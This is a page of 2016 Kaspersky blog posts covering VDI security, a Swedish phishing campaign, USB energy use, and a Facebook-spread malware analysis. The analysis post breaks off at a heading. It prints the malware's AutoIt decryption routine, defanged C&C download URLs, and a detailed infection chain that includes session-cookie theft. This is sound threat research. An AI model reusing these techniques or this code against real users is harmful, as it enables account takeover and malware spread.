Online headquarters of Kaspersky Lab security experts.
Updated: 2 hours 48 min ago

### VDI: Non-virtual problems of virtual desktop security, and how to solve them for real

Thu, 07/07/2016 - 06:55

Introduction

Virtualization marches victoriously across the globe, adding to its list of champions not only individual IT-specialists and businesses, but even whole sections of the IT industry. In fact, it’s barely possible to find a data center with only physical servers on board: both electricity and physical space are far too expensive nowadays to be used so inefficiently.

Meanwhile, the possibility of hosting multiple servers on a single physical machine is just one benefit among all those offered by virtualization.

Second only to servers, the most important application of today’s virtualization technologies is probably Virtual Desktop Infrastructure, or VDI. While using the same concept of multiple computers hosted inside a single physical ‘body’, its purpose is entirely different from server virtualization: to substitute a heterogeneous and cumbersome ‘zoo’ of physical desktops with homogenous and easily controlled virtual environment.

As opposed to familiar – and age-old – Terminal Services infrastructure, offering shared access to the same machine running a single instance of an operating system, VDI is about ‘genuine’ virtualization. Every single virtualized workstation has its own set of virtual hardware, OS and applications – and its own range of potential security issues. There tends to be a much higher probability, too, of encountering security issues with VDI than with virtualized servers. This is especially true in scenarios which include access to the ‘Big Internet’, with its landscape of threats and hordes of marauding cyber-predators, always hungry for other people’s data and money. And God help you, if you buy into the myth about virtual environments being inherently more secure than physical ones! The exact opposite is true: not only they are similar in terms of threat levels; virtual environments possess some specifics that actually make the task of securing them even more complex.

This is what we are going to talk about here: about VDI myths, specifics – and how to provide proper security for corporate VDI, without compromising any of its many benefits.

VDI: Pros and Cons The Pros

Before plunging deep into problems associated with VDI, it might be useful to remind ourselves of the benefits that have earned the technology the undying love of both sysadmins and ITSec specialists.

• VDI is effectively agnostic of the end-user’s hardware and software. The only requirement for any client device, be it a regular PC, a smartphone or a thin station, is the ability to run a client application (in some cases, even a simple web browser will do).
• VDI offers a considerably higher level of data security. With all the valuable information stored deep inside the corporate infrastructure or in a datacenter, many data loss scenarios, like device theft or physical loss, are ruled out.
• VDI environments are highly flexible in management terms: every virtualized workstation and application can be deployed and controlled with an ease and speed that’s unattainable for purely physical infrastructures. With finely tuned working practices, it may not even be necessary to solve any problems associated with a given virtual machine: just killing the VM and spawning it back from the template can be enough. All user data can then be re-accessed from centralized storage once the user logs back in.

This list of VDI benefits is clearly incomplete. But even these key points are enough for some businesses requiring high mobility accompanied by strong data security to embrace the concept with eagerness. Typical examples are healthcare, insurance and, in some regions, banking; business processes taking place in these industries are highly regulated and easily formalized, which greatly simplifies the task of VDI implementation.

The Cons

Unfortunately, no solution consists entirely of benefits – and VDI has its range of nuances and limitations to be mindful of.

• VDI is highly sensitive to resource consumption. Virtual environments are designed so that users can perform tasks in a way that’s very similar to using regular PCs. But, even when a limited number of software titles are used for a limited number of tasks, some can not only be resource-hungry, but can have a considerable adverse impact on VDI performance in particular. Few things are more demotivating to a workforce than system lags and general unresponsiveness; as well as unnerving and irritating people, this can easily kill off all the efficiency gains delivered by VDI deployment. So it’s necessary to consider and to constantly monitor all the influences on system responsiveness – including the impact of security solutions.
• VDI works better with formalized business processes. VDI is most easily justified when business processes are predictable, and all the applications used are known. If this is not the case, resource consumption and overall performance calculations can suddenly prove misleading or just plain wrong. The threat to corporate security posed by the unrestricted use of unknown applications, or course, presents a threat to corporate security, as well as compromising the accuracy of performance predictions.
• VDI presents complex requirements for deployed security solutions. As opposed to attacks on data-storing servers and similar scenarios where the main target is remotely accessible data, virtualized workstations are subject to practically the same spectrum of threats as those targeting physical machines. These threats can include, for example, ‘bodiless’ malware using exploits to inject malicious code into legitimate processes and running entirely in the system’s volatile memory. Unfortunately, the majority of well-known specialized solutions claiming to cater for the specific requirements of virtualized environments offer protection at file system level only, which is far from adequate for VDI defense.

Of course, installing a security solution designed for physical desktops, perhaps modified to be ‘virtualization-friendly’, is an option. But this may well result in considerable increases in resource consumption, drastically reducing VDI efficiency. These solutions involve each virtual machine (VM) carrying its own set of engines and databases, each updating independently from its neighbors. In a worst case scenario, a solution’s failure to demonstrate sufficient ‘virtualization awareness’, can result in ‘activity storms’, where multiple simultaneous updates or scanning processes create an avalanche of increased resource consumption, bringing the entire host to a grinding halt.

Myths and Threats

Despite virtual desktops being very similar to their physical counterparts in terms of functionality, the misconception that they are less susceptible to infection is quite widespread amongst users and even IT professionals. Some of the arguments used may look like these:

• Malware itself is afraid of virtual machines, suspecting them of being sandbox systems or researchers’ machines. So, when the malware detects that it’s being launched in a VM, it won’t activate.
• In a properly configured VDI, the VM itself is of no value. If an infection strikes, it’s just a matter of killing off the infected machine, with no need to bother about the malware itself.

Let’s see what stands behind these assertions, and how safe it is to base your approach to VDI security on them.

VM as Malware’s Scarecrow

This argument is based on something that’s actually quite true: many malware specimens do check for signs that they’re being launched inside a VM. But what happens next is not so predictable. Malware creators are keenly aware that these VMs are usually NOT sandboxes and can contain valuable data – or can serve as entry points to entire IT networks. So they’re rapidly learning to tell sandboxes from less sophisticated VMs. For this, an extensive range of indicators can be used: previously investigated IP addresses of researchers’ systems, typical user and computer names, unnecessary system components missing or removed to reduce resource usage – and so on. There are also more advanced tricks and indicators to detect sandboxes, such as leaving some kind of token in the file system or repeated communications with C&C throughout the whole attack cycle (which won’t happen during sandboxing) etc. And there are also directly controlled targeted attacks, during which the command for proceeding (or withdrawing) is issued by living people, based on acquired intelligence.

The bottom line is this: some malware, and only some, may refuse to start in a VM. It would be extremely foolish to rely on this when building a security system for corporate VDI (which is even more susceptible to infection than server VMs).

No machine – no infection?

The main flaw in this argument lies in the perception of the infected machine as an isolated instance. Any infection can involve multiple VMs residing in the same network segment: if just one contracts malware, especially given the lightning-fast speed of a virtualized network, the contagion can spread like wildfire. It doesn’t matter if the original infected machine is killed – the process of cross-infection within a network segment with sufficient vulnerable nodes can theoretically go on forever. Or, more precisely, it can go on until the moment when the whole network segment shuts down entirely.

And another thing. With the initial infected machine consigned to oblivion, traces of the initial infection – all too precious for restoring a full picture of the attack during investigations – will be lost forever.

It’s also worth bearing in mind that some more advanced malware specimens can be remarkably adept at evading detection. Specialized security solutions working only at file system level, without the capability to watch over processes in memory, can give the malware plenty of time to do its job (e.g. syphoning away the data it has found) before the VM is deleted.

Obviously, if the infection is spotted after any malicious files may have been dropped into the file system, mercilessly killing off the affected VM is no guarantee that you have stopped the infection in its tracks.

The Boundless Sea of Threats

We have said that virtual desktops are susceptible to almost the same spectrum of threats as are physical machines. But what about specialized attacks, targeting the specific vulnerabilities of virtualized environments?

Well, there is no shortage of Proof-of-Concept demonstrations, as shown during security conferences and described on the internet. Potentially, such malware could do considerable harm, but… there are as yet no officially registered cases of such attacks being spotted in the wild. Still, there’s no reason to be over-optimistic. The most important driver to innovation in any area – including the creation of malware – is the existence of an obvious demand. Once the penetration rate of virtualized assets reaches a critical point, the in-lab theoretical threat could become a reality in no time. And here we’re talking about the more common threats; if there’s a requirement to attack a particular VDI in order to get to a particularly valuable piece of data (and the money to sponsor such a complex attack)… well, any kind of technology can be put to use, including fully customized designs that are completely unknown to the general public.

Even without the attack scenarios we anticipate in the immediate future, there is enough malware right now to provide VDI owners with the same problems that physical IT network owners already experience.

VDI Defense: Strategy and Tactics

Protecting VDIs is mandatory, and no mythical inherent resilience offers a legitimate defense against the existing threat landscape. So, how do we approach this task appropriately – and what stratagems can be used to best preserve all the beneficial effects of VDI deployment?

Configure Safely!

As we all know, the most dangerous vulnerability in any system is people. And we’re not only talking about careless office staff, mindlessly clicking on links and opening files received from strangers. This also applies to those equally careless IT specialists who configure their systems in ways that leave gaps for intruders to abuse.

So, what screws can be tightened to make the conditions as uncomfortable as possible for any attacker? Here are several examples which, theoretically, are applicable to both physical and virtualized networks.

• Forbid any type of local authorization using domain policies. This can be especially useful for ‘disposable’ VMs, which are created and deleted on demand: the task of fixing a faulty machine, which could require a local login procedure, is not a viable option.
• Whenever the business process allows this, reduce the user’s capability to run unsolicited programs to a minimum, perhaps going as far as deploying a Default Deny scenario. Given the known specifics of particular industries where VDI technology is most popular (like healthcare or insurance), the implementation of such a scenario can be undertaken without much hassle.
• Rule out the use of Java and other command interpreters, including Powershell and even CMD.EXE, if business processes don’t explicitly rely on them. Java remains one of the most exploited components of any system, and script chains are gaining in popularity as a ‘legit’ way of circumventing detection and even application control mechanisms.
• If the network configuration permits, use Private VLANs to isolate VMs from one another. In the majority of business scenarios, there’s no need for VMs to see one another on the network: they only need access to particular servers and network services – and to the internet if required. Such a configuration can considerably reduce the possibility of infection spreading. Though it’s worth bearing in mind that, in some cases, this would require the physical switchers to support PVLANs as well. But even then, as part of a Software-Defined Networks paradigm, there are virtual switches which prevent the flooding of physical switches without PVLAN support residing in the same IT network.

Private VLANs provide a simple way of selectively isolating VMs without exhausting IP subnets.
Source: VMware

Multi-layered protection

Taking into account the rapidly changing threat landscape, VDI protection should not be in any way inferior to defenses used for regular machines, especially if work undertaken includes accessing the big internet.

This means that, besides traditional signature-based protection or even advanced file-level protection based on heuristic algorithms, any solution should be armed with behavioral detection technologies and some means of exploit mitigation. And this can only be considered a bare minimum; ideally, the solution should possess additional proactive security layers such as application control, web control and device control.

The Conventional Approach

This can readily be achieved by installing regular security solutions using full-weight agents, initially designed for the protection of physical workstations. However, as discussed earlier, even if adjustments have been made to cope with specific aspects of virtual environments, the issue of excessive resource consumption requires a fundamentally different approach.

The Agentless Approach

One such approach leverages VMware’s vShield (and now NSX) technology, and so can only be adopted for VMware based environments. The ‘Agentless’ approach conducts all security activity in a single Security Virtual Machine (or SVM) on the virtual host, using VMware’s own technologies to communicate with and protect the individual VMs.

With signature updates and scanning engines held on just one SVM per host, instead of on every VM that the host is servicing, the resource savings compared with full-agent protection, in terms of both space and processing power, are considerable. And with just one SVM being updated, instead of all those individual machines, traffic is drastically reduced and ‘AV storms’, where lots of machines all try to update or perform malware scanning simultaneously, are eliminated.

For IT environments with no direct external exposure, particularly where foreign agents are not permitted onto clients’ machines – in a data centers for example – the agentless approach is an excellent solution. But, for VDI environments, such as VMware’s own Horizon, where individual machines are so much more exposed, this approach is definitely not sufficient in terms of security. This is primarily because an agentless approach does not allow the security solution any direct access to or control of processes in the individual machine’s memory.

The Lightweight Agent Approach

But there are specialized solutions providing high levels of security AND also operating as an organic element of the virtualized infrastructure, without duplication and resource wastage. The answer lies in solutions using lightweight agents.

Like agentless solutions, this approach also employs a dedicated ‘Security Virtual Machine’ (SVM), which does away with duplicated copies of scanning engines and databases residing on every single protected VM. Instead of relying on the vShield or NSX technology layer, however, this approach employs lightweight program agents, so that the solution can not only reach into the individual VMs’ systems on behalf of the SVM, but can also control processes in the machines’ memory, allowing for behavioral detection by other advanced technologies. And, of course, this approach is not tied to VMware technology, but can be applied to other platforms, including Citrix, Microsoft and KVM.

Solutions built using this principle also allow for the provision of additional security layers.

For example, in our Kaspersky Security for Virtualization | Light Agent, the following technologies are implemented:

• Web Control (with cloud-supported Web Resource Categories)
• Device Control
• Network Attack Blocker (a network IDS/IPS protecting from network-based attacks and exploits)
• HIPS (Host-Based Intrusion Prevention System)
• Firewall (working on multiple OSI levels including Application)
• Anti-phishing (backed by cloud-based reputational service and autonomous heuristics)

(More details about Kaspersky Security for Virtualization | Light Agent can be found here.)

All these protective layers provide much greater levels of security in defense of endpoints which, virtualized or not, remain the primary targets for attackers. Of course, every further security layer requires additional resources, but, with the majority of resource-heavy processes being relocated to the SVM, the deployed lightweight agents can easily remain quite slim.

Such architectures also ensure higher fault tolerance. Should an SVM become unavailable for a period of time, additional security layers won’t leave the machines completely unprotected. In addition, the system event data obtained can be stored locally for later analysis after re-establishing connection with the SVM – or being temporarily rerouted to another SVM on the same network.

Such solutions are initially designed to be fully aware of all virtualization’s unique requirements – and the specifics of VDI in particular, including mechanisms like machine migration or Linked Clones. Properly designed lightweight agents can also be easily embedded into VM templates, allowing instant protection immediately after machine activation.

All these mechanisms and their outcomes and benefits have been tested, in the case of Kaspersky Security for Virtualization | Light Agent, with popular VDI systems including VMware Horizon and Citrix XenDesktop in ‘real life’ conditions.

Heterogeneous environments

Since the connection between the agents and the SVM doesn’t require any platform-dependent intermediate layers, it’s possible not only to protect different virtualization platforms with ease, but also to cover heterogeneous environments with a single solution. This removes the necessity of having different management consoles for each platform solution, and considerably simplifies the management process for IT security specialists, saving time and reducing the probability of human error.

Conclusion

The global transition into virtualized space is still ongoing, and the number of VDI scenarios is growing every day. Even complex, resource-hungry tasks like graphic processing or software development, which were only recently being described as ‘future tech’, are a current reality. Unfortunately, it’s often impossible to formalize complex business processes using strict policies – so there are always ‘soft spots’ in any given system. These soft spots in virtual infrastructure need to be hardened using specialized security solutions combining both traditional and innovative, proactive protection methods. This combination is most commonly found in solutions using lightweight agents – which, given the existing threat model, become a natural choice for VDI protection.

### An increase of sophisticated phishing attacks in Sweden

Wed, 07/06/2016 - 12:13

Whilst sitting and working in the South African office I receive an email from my Swedish ISP. I quickly look at it and there is something that doesn’t add up. The email states that I need to pay my invoice, but I never receive electronic invoices from this company.

Like everyone else I receive a lot of spam and phishing emails, but this one is different from any other phishing email I have ever seen before. To be honest, it’s probably the most sophisticated phishing campaign that I’ve ever encountered. It’s not the technical setup that makes it sophisticated it is a very simple factor that has been added to the email that just makes the email look very authentic.

The phishing campaign has the usual mistakes, the sender of the email is not related to the company, and the domains used in the links don’t point to a domain that is registered by the ISP.

There has been a huge increase in these kind of phishing emails lately but it’s the first time I have seen these emails. What makes this campaign so interesting is that they have not just addressed the email to me, but also included my child’s name. This is something I have never seen before. How they got access to my child´s name is not sure, one speculation is that they compromised a Swedish governmental agency, but this has to be left unconfirmed.

What happens when you click on the link is it will redirect you to a website. This website will enumerate from your country of residence to make sure that you are actually a Swedish victim. Additional to this, it will enumerate your browser by analysing the User-Agent string.

Why they check the Operating System is because the next step in the campaign is to trick you into downloading a Windows executable. We are currently investigating what the malware is doing, but from our previous research it seems that it’s some kind of Cryptolocker.

The download page looks very authentic, it even uses the domain teliafakturor.net (translated to teliainvoices.net), with a little captcha. When you click on the download button you will be offered a ZIP-file.

This archive contains an obfuscated JavaScript which will then download the actual Windows executable. Even though the JavaScript is obfuscated the download URL is not, so it’s very easy for any researcher to get hold of the malware, and block it. Below is a script of the obfuscated JavaScript.

When analysing the landing pages and the source code i found something that was quite interesting. The language of the HTML editor that was used is Russian, and some of the domains are registered to an email address, which has registered other domains in Russia. This might be an indicator that the persons behind this scam has Russian origin.

### Surges in mobile energy consumption during USB charging and data exchange

Wed, 07/06/2016 - 05:53

Recently, our colleagues questioned the security of charging mobile devices via USB ports. They discovered that if there were a computer behind the port, there would be a data exchange, even when the mobile is blocked. We became curious – is it possible to measure the energy consumption of the “host + mobile” system during handshakes? Also, is it possible to estimate the impact on energy consumption when we separate the charging process from data exchange using the Pure.Charger device?

As it turned out, it wasn’t too hard to measure energy consumption – all it takes is a commercially available multimeter, preferably, with serial connection to a computer, which would allow you to analyze logs in a convenient manner. It was possible to provide a rough estimate of how much energy is dissipated during handshakes and to estimate to a known degree of certainty the amount of energy required to send one bit of data over the USB connection.

A little bit of theory

Dissipation of electrical energy into heat is due to two key reasons, the first being the imperfection of even the most modern computers and the second being the irreversibility of classic (non-quantum) computing.

The fundamental limit on energy consumption can be estimated using Landauer’s principle, first introduced in 1961: ∂Q = dS · T = kTln(2), which is equal to roughly 3×10-21 Joules (J) at room temperature. In reality, computation and, especially, data transfer is much more energy-hungry. We learned from a 2014 review by Coroama and Hilty, published in Environmental Impact Assessment Review, that it takes approximately 4×10-7 Joules per bit to transfer data over the Internet. That is 14 orders of magnitude above the fundamental limit.

Unfortunately, we haven’t been able to find similarly thorough and high-quality reports on energy consumption during USB data transfer. So, we decided to perform our own experiment.

Experiment

We have used various combinations of host systems and mobiles.

Notebooks Operating System Apple MacBook Pro OS X 10.10.5 Dell Latitude E6320 Windows 7 64-bit Enterprise Edition

To which we’ve been connecting these mobile phones:

Mobile device Platform Samsung GT-i9300 (Galaxy S3) Android 4.4 LG Nexus 6X Android 6.0.1 Apple iPhone 4s iOS 9.2.1

The choice of mobiles was dictated by the fact that Android 6 mobiles behave themselves differently than smartphones on earlier versions of Android. They have a built-in protection from USB data transfer, enabling “charge-only” mode by default upon connection to a USB port. However, since we already knew from the previous research that a handshake, nonetheless, occurs in this setting, too, we wanted to check the energy consumption of phones during handshakes. We also wanted to discover the difference in behavior of mobiles based on different versions of Android and iOS.

Diagram of the experiment set-up in the MacBook Pro experiment

Experimental set-up in the Dell Latitude E6320 experiment

Our simple experiment, in essence, was to measure the current flowing through the wire that connects the system, which comprises a host, a connected mobile, and a power outlet. We designed this experiment in such a way, on one hand, to ensure the reproducibility of its results and, on the other hand, to avoid damaging the computer’s power adapter. Thus, we also tested the stability of the frequency and voltage of the alternating current and saw no dependence of these two parameters from the data exchange.

Since the multimeter provided us with RMS (root mean square) values of the alternating current within finite time intervals, the amount of consumed energy can be approximated by a sum of products of current IRMS average value of voltage URMS and time interval duration δt. We have used the RMS values of current in all our calculations instead of amplitude (I0 = IRMS *√2), because, by definition, the RMS value is equivalent to a value of DC current that dissipates the same amount of heat on the same resistive load.

Results Handshakes

In order to exclude the charging current’s influence on multimeter readings, the mobiles and laptops which we used as host computers, were fully charged. Furthermore, we used a Pure.Charger device, which allows us to turn the USB data lines on and off as desired. The sequence was the following: first we connected the Pure.Charger to the host computer’s USB port and then we introduced the mobile device to Pure.Charger’s output USB port. By doing so, we effectively separated the moment of connection to the USB port and the moment when data lines were enabled.

In the graph below you can see the consumption current dynamics (in mA) when a Nexus 5X was connected to a MacBook Pro host:

Here we see two distinct peaks of current, first when the phone is connected to a data line in “charge-only” mode, and second – when the MTP mode is enabled.

Current consumption dynamics for the connection of an unblocked Samsung S3 looks like this:

Here we see a single large consumption peak – because the phone is not blocked, it starts an MTP session right after it’s connected to the port.

The graph below we obtained with an iPhone 4S and a Latitude E6320 with the same settings:

The main consumption peak, due to the handshake between the Latitude E6320 and iPhone 4S, is preceded by a smaller spike, which corresponds to a handshake between the Latitude E6320 and Pure.Charger. As the amount of energy consumed during the handshake is proportional to the area below the curve, it can be seen that the amount of energy consumed due to the handshake of the host with Pure.Charger is significantly lower that the amount consumed due to the handshake with the iPhone 4S.

The experiment with the Latitude E6320 and iPhone 4S is the only one where Pure.Charger’s handshake is clearly seen – it is not distinctly observed in other experiments. The Pure.Charger’s consumption current, as obtained in the series of the experiments, does not exceed the idle current standard deviation for both the MacBook and the Latitude E6320.

The value of current fluctuations in the Latitude E6320 experiment (standard deviation was equal to 7-8 mA) was greater than current fluctuations in the MacBook experiment (standard deviation was equal to 4 mA). There are two reasons for this. Firstly, the Latitude E6320 was built using HDD and the MacBook Pro that we used was built using SSD. Secondly, in the corresponding experiment the Latitude E6320 was used both as a host and as a logging system.

Data transfer

In order to learn more about how much energy is required to send a unit of data over a USB connection, we had the hosts and the mobiles transfer files of a specified size to one another.

Fixed amount of data

The dynamics of the consumption current, in mA, for the Nexus 5X that was tasked with transferring 391 MB of data to the MacBook host, looked like this:

Here we observe the same two consumption peaks specific to an Android 6-based device, and an increase in the average consumption current during data transfer.

This is how the consumption current depends on time in an experiment where the MacBook Pro was reading 188 MB of data from Samsung S3:

Here we see a sharp single peak corresponding to a handshake with Samsung S3, a distinct start and finish of file transfer with increased consumption current, and a small spike in the current when the phone is disconnected, which is due to the system closing processes and windows which were active when the phone was connected.

We have carried out multiple similar experiments. As expected, the time interval elapsed for file transfer, was dependant on the file size – the larger the file, the longer it takes to send it through the USB channel.

Energy consumption dependence on the direction of data transfer

Does energy consumption depend on the direction of data transfer? We set up an experiment during which a group of files of the same size was sent to the host from the mobile, and vice versa, and measured the system’s consumption current. Because it’s impossible to send the files directly to an iOS-based mobile, this experiment was performed only with Android-based systems.

The left-hand graph shows the consumption current dynamics (in mA) when the Latitude E6320 is connected to the Samsung S3 and reads 808 MB of data. The graph on the right shows the current consumption when the Latitude E6320 sends the same amount of information to the Samsung S3. Despite the noise specific to the Latitude E6320 series of experiments, the moments of file transfer start and finish are seen clearly.
We carried out six similar experiments and came to the following conclusions:

1. The average value of consumption current while sending data from the host to the mobile is lower, and this decrease is greater than the standard error.
2. Meanwhile, the time elapsed for sending the file from a host to a mobile is longer than the time elapsed for receiving the same-sized file by a host from a mobile. This time interval increase is roughly the same as the decrease in average consumption current.

Taking into account that the voltage was the same, the energy consumption can be estimated as a product of voltage times average current and times the length of the time interval. The estimated values of energy consumption for data transfer from mobile to host and from host to mobile were effectively in the same confidence interval.

Energy consumption per unit of information

In order to approximate the dependence of consumed energy on the size of data we made two assumptions:

1. The amount of energy required to transfer a unit of data depends only on the type of host and mobile.
2. The amount of energy required to transfer a known amount of data is directly proportional to the size of data sent. This assumptions is probably not correct, because communication systems, and USB in particular, are optimized for sending data in bulk, thus the smaller the amount, the less energy is required to transfer it. However, there are accompanying computational processes that don’t go away. Therefore, it would be more accurate to approximate this dependence with a power function with fractional index. But the difference between linear approximation and such a power function would be significant for smaller amounts of data.

Under these assumptions, we have estimated that the most energy-efficient pair is the MacBook Pro connected with the Samsung S3 – they dissipate only (3.3±0.2)x10-8 Joules per bit, and the most power-hungry combination was the Latitude E6320 with the iPhone 4S, which dissipated (9.8±0.6)x10-8 Joules per bit.

Conclusions

The amount of energy required to transfer a unit of information through the USB channel is within the range of 3.1×10-8 to 1.4×10-7 Joules per bit. Remember the article we cited in the beginning? Their assessment (for transfer of Internet data) was 4×10-7 Joules per bit, which means that our assessment for USB connections is within the same order of magnitude.

Still, there are two more things to consider for further research. First, data transfer during handshakes is different from file transfer as it involves more computational processes and thus leads to greater consumption of system energy. Second, the dependence of energy consumption on the size of transferred data is presumably not quite linear, and for better accuracy should be approximated with a convex function. A better approximation requires more data points and more pairs of hosts and mobiles to be investigated.

Economy of scale

To sum it all up, I’d like to estimate the ratio of energy consumption caused by handshakes to the energy that is consumed while charging a mobile device. A typical charge on a 2 A current would last 20 to 40 minutes, which means that a mobile receives anywhere from 12 to 24 kJ of energy when charging. Therefore, blocking the handshakes that waste a few to dozens of Joules, allows for saving tenths to hundredths of a percent of this energy. A single user would not even notice this effect, but if all the folks living in New York used a Pure.Charger, they would save a whopping 33 Kilowatt-hours of electricity every day! To give you an idea of how much this is – Tesla electric cars can drive over 100 miles on this charge. This may not look like a big deal for a mega polis, but it’s a noticeable effect, isn’t it?

We will continue to research the physical characteristics of mobile devices during data exchange, both from a security perspective and in search of more data points. We welcome readers to reproduce this experiment themselves and report their findings!

This material uses experimental results submitted for publication in IEEE Transactions on Mobile Computing. The preprint is available here.

### Facebook malware: tag me if you can

Thu, 06/30/2016 - 08:19

On the morning of 26th June, news of a phishing campaign hit the Israeli media. Thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment.

Kaspersky Lab decided to investigate. We quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. We also found that the attack was not confined to Israel, but was hitting targets worldwide.

The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating their legitimate browser session and replacing it with a malicious one that included a tab to the legitimate Facebook login page. This was designed to lure the victim back into the social network site.

Upon logging back into Facebook the victim’s session was hijacked in the background and a new file was downloaded. This represented the second stage of the attack, as embedded in this file was an account-takeover script that included a privacy-settings changer, account-data extractor and other tools that could be used for further malicious activity, such as spam, identity theft and generating fraudulent ‘likes’ and ‘shares’. Further, the malware infection loop began again as malicious notifications were sent to all the victim’s Facebook friends.

The Kaspersky Security Network (KSN) recorded almost ten thousand infection attempts around the globe in the space of just 48 hours.

Malicious JavaScript file spike hits thousands of victims

Facebook has now mitigated this threat and is blocking techniques used to spread malware from infected computers. It says that it has not observed any further infection attempts. Google has also removed at least one of the culprit extensions from the Chrome Web Store.

Top targets

The most affected countries were Brazil, Poland, Peru, Colombia, Mexico, Ecuador, Greece, Portugal, Tunisia, Venezuela, Germany and, finally, Israel.

On a pie chart we can more easily see how the infection spread around the globe:

It’s worth mentioning that people using Windows-based computers to access Facebook were at the greatest risk. Those using Windows OS phones could have been at risk too, although this is less likely. Users of Android and iOS mobile devices were completely immune since the malware uses libraries which are not compatible with these mobile operating systems.

The infection process

The infection seemed to begin when victims received a notification of a Facebook “mention” that appeared to come from a friend:

This provided the attackers with a rabbit hole through which they could hijack the user’s Facebook session and permissions and send out malicious notifications to the victim’s Facebook friends. During our investigation we found the script that was responsible for the delivery of the malicious notification. This script was triggered when the user of a compromised machine attempted to login to Facebook via a malicious Chrome shortcut.

Initial infection

File: comment_27734045.jse Language: JavaScript Size: 5.31 KB MD5: 9D3DF2A89FDB7DA40CEB4DE02D605CFA SHA1: 6D658331FE6D7F684FEE384A29CE95F561A5C2EA

The malicious file above was involved in the specific attack discussed in this blogpost. A Trojan downloader generator was discovered residing in the following domains:

#1 hxxp://lllllllllll[.]top/end.php?ref= #2 hxxp://corneliuspettus[.]com/fil.php

Unbeknown to the victim, the JavaScript file executes a batch file which calls a pre-downloaded utility called “AutoIt.exe”, with one argument – ekl.au3. This file is an AutoIT script and the executable is simply a compiler that runs it.

The malicious code starts after a #NoTrayIcon; initializing variables and immediately starting to send arguments to the decryption routine located at the end of the script. The majority of the payloads are encrypted. However the decryption key is hardcoded and the standard function can be copied outside of the code and automated for safe decryption.

Func YK69395P92380($KS50476D12399,$JF22904R13060) $KS50476D12399 = BinaryToString($KS50476D12399) $YK28157F62492 = _Crypt_DecryptData($KS50476D12399, $JF22904R13060,$CALG_AES_256) $YK28157F62492 = BinaryToString($YK28157F62492) Return $YK28157F62492 EndFunc Or in a more simplified way: Func Decrypt($encrypted_input,$key)$encrypted_input = BinaryToString($encrypted_input)$decrypt_output = _Crypt_DecryptData($payload,$key, $CALG_AES_256)$decrypted_output = BinaryToString($decrypted_output) Return$decrypted_output EndFunc

The function takes two arguments. One is a hexadecimal string which represents the encrypted payload and the other is a the key. The encryption algorithm used in _Crypt_DecryptData() is CALG_AES_256, 256 bit AES, which is hardcoded as well.

The code is generally pretty straightforward. Even without decrypting the encrypted content one can spot the stored variables being used: ProcessExists, ProcessClosed, DirCreate, AppDataDir, RegRead, FileDelete, DesktopDir and so on. In addition, the author left comments for the reader which can be very helpful.

The full code snippet can be found here: http://pastebin.com/raw/k8m0QP1p

Background check

The Trojan downloader is not new. It was spotted more than a year ago bearing Turkish variables and comments in its files. The alleged actor in this instance, known also as BePush/Killim, used innovative techniques to spread malware through social networks. It is known to favour multi-layered obfuscation, mainly in JavaScript, and utilize multi-layered URL shorteners, third-party hosting providers and multi-stage payloads.

The group obfuscate their infrastructure using Cloudflare and register domains with WHOIS guard privacy protection. They also monitor each infection using third party analytics scripts.

We have found that this particular threat actor seems to prefer using the following providers: Amazon AWS, Google, WhosAmungUs, TinyURL, Bitly, Cloudflare and more, suggesting that it favours freeware over paid services.

Once executed, the malicious script opens a socket to one of its command and control (C&C) servers, calling up a dozen files and downloading them one after the other from the C&C server, all with the same image extension (.jpg). The script then replaces this extension with the real ones. We’ve documented the following file extensions:

exe – utility to load malicious .au3 scripts.
bat – batch file that executes the binary, appending .au3 scripts as arguments.
au3 – malware code.
zip – empty zip.
json – manifest for Chrome extension configurations.
dat – malware version.
js – additional scripts supporting the Chrome extension and scripts to collect victims’ statistics.

Looking at the JSE file content, the first code segment is an array of strings. These strings are simply appended to the code and are in this form for the sake of code obfuscation.

Strings stored in the JSE file containing the C&C server and malicious files

At the top we see the strings responsible for opening the connection with the remote C&C server, followed by those for reading the files and changing their extension. The %APPDATA%, ExpandEnvironmentStrings and Mozila represent the actual location where the malicious files will be stored.

Looking at the destination folder of the malicious files we see a weird-looking variable name: Mozklasor. This translates to “Purple Folder” in Turkish, and points to Turkish-speaking threat actors, as mentioned above.

Creating %AppData%\Mozila directory to transfer malicious files

After a successful download, we can browse to the Mozila folder in the AppData and examine the changes that have been made in it. In addition to the files residing in our fake Mozila directory, the JavaScript also executes the run.bat file which loads the executable file with one of its scripts as argument.

We notice that a set of files has been added. In addition, a script has been executed in the background, closing our browsers, adding Chrome shortcuts to our desktop and relaunching the browsers in infected mode with a malicious extension embedded in the opened instance, alongside some registry manipulations we were not aware of. This behaviour occurred after the JavaScript file had executed the batch file run.bat, which calls the autoit.exe utility and loads it with ekl.au3.

Browsers closed unexpectedly and new apps were added on the desktop

The malware terminated the Chrome process we were browsing in. In the same situation the most natural behaviour for a victim would be to look for the nearest browser application and execute it. Once the browser shortcut is executed, we notice two suspicious items.

Victim is lured into opening a malicious Chrome shortcut

The browser opens with an additional tab containing the Facebook login page. The threat actor believed that users who (like us) had been browsing through Facebook before encountering the malware, would simply expect the browser to restore the website. An important note for the sharp-eyed is that the restore window is open. This means that the Facebook page has not yet been restored by the user.

The second (tiny) item is an extension that had been silently added to the Chrome extensions list. It appears as an [a-z] one character with grey background in the top right-hand side.

Looking in the Mozila folder again we can identify a Manifest.json file which points to the fact that the infection process involves an extension.

A malicious extension is being added to Chrome

Browser extension permissions in detail

Alongside the permissions that the extension receives, it loads an external script (bg.js). This script is responsible for protecting it from being deleted. It also contains a listener to outgoing DNS-resolving queries sent via the URL bar, and blocks a large number of black-listed web domains.

Black-listed domains which are blocked from access

If the user attempts to access one of these websites, the browser will return the following error:

Black-listed domains blocked

When the victim eventually decides to access their account on Facebook, a remote script will be loaded from the C&C and executed on the client-side. It is a rather large JavaScript file (~80KB) which is responsible for taking over the account and spreading the malware to other Facebook users.

Following a successful login attempt, the JavaScript file data.js will load and redirect the user to a page that suggests in Spanish that “Before logging back into your account it is recommended to clear your cookies. It can be done via the Settings menu in Google Chrome, watch this tutorial if don’t know how.” The attackers request this in order to get new user-session identifiers. In the malicious code, the string c_user is mentioned. This cookie, among others, is a session cookie and can potentially offer significant value to attackers.

After logging in, it can be seen that the attack was executed and that the user’s entire Facebook list was notified by the victim about a new URL. Upon clicking on this URL, the user’s friends will also become malware hosts and the infection process will loop again, through their friends.

Lateral Movement

